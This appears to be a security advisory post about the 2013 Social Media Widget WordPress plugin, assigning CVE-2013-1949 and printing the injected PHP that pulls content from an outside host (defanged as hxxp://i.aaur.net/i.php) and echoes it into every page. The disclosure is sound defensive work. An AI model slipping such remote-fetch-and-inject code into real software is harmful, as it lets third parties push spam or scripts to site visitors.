http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue
developer they contracted inserted this code:

470
471      $smw_url = "hxxp://i.aaur.net/i.php";
472      if(!function_exists("smw_get")){
473      function smw_get($f) {
474      $response = wp_remote_get( $f );
475      if( is_wp_error( $response ) ) {
476      function smw_get_body($f) {
477      $ch = @curl_init();
478      @curl_setopt($ch, CURLOPT_URL, $f);
479      @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480      $output = @curl_exec($ch);
481      @curl_close($ch);
482      return $output;
483      }
484      echo smw_get_body($f);
485      } else {
486      echo $response["body"];
487      }
488      }
489      smw_get($smw_url);
490      }

Regardless of HOW this code got into the plugin it represents a
significant security issue. Any site using this plugin is pulling
"hxxp://i.aaur.net/i.php" and including it in the page they generate
and send to a user. This opens up a huge can of worms, anyone that can
man in the middle your server can now inject PHP into your blog, ot
anything sent to the clients/etc.

Please use CVE-2013-1949 for this issue.